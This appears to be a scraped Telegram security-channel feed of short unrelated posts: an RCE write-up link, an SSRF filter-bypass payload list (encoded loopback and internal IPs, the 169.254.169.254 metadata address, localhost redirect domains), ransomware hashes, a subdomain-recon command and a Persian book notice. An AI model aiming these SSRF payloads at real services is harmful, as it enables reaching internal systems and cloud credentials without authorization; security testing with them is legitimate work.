Windows 10 RCE

The exploit is in the link

Link : https://positive.security/blog/ms-officecmd-rce

#RCE

lets go for ssrf bypass

Bypass using octal IP

Implementations differ on how to handle octal format of ipv4.



http://0177.0.0.1/ = http://127.0.0.1
http://o177.0.0.1/ = http://127.0.0.1
http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1

Bypass using a decimal IP location



http://2130706433/ = http://127.0.0.1
http://3232235521/ =http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/ = http://169.254.169.254

Bypass localhost with CIDR
It's a /8

http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

Basic SSRF v1

http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22

Bypass localhost with a domain redirection
http://spoofed.burpcollaborator.net
http://localtest.me
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
http://bugbounty.dod.network redirect to 127.0.0.2 == localhost

using this website for convert ip to integer and bypass🤤


https://www.browserling.com/tools/ip-to-dec

#log4j !!!
https://news.1rj.ru/str/matitanium

😈BlackCat Ransomware Linux variant.😈

-V x32:
843001980e5073c7f0ea8b56873246b8

-V x64: 79fea7f741760ea21ff655137af05bd0


#kernel #blackcat #ransomware #linux

@matitanium

برای مثال
subfinder -d example.com | httpx -status-code -ip -mc 200

📌 #برگه_تقلب Google dorking از موئسسه Sans

کتاب «فقط برای تفریح»، نوشته لینوس توروالدز
ترجمه: میرعماد میرمیرانی ( جادی)
نشر ترجمه این کتاب توسط مولف آزاد عالم شده است.
توضیح:
این کتاب، نوشته لینوس توروالدز خالق لینوکس و دیوید دیاموند است. یک خبرنگار مدت‌ها با لینوس وقت گذرونده و حرف‌هاش رو شنیده و نتیجه‌اش شده این کتاب که با نام انگلیسی Just For Fun توسط انتشارات TEXERE منتشر شده.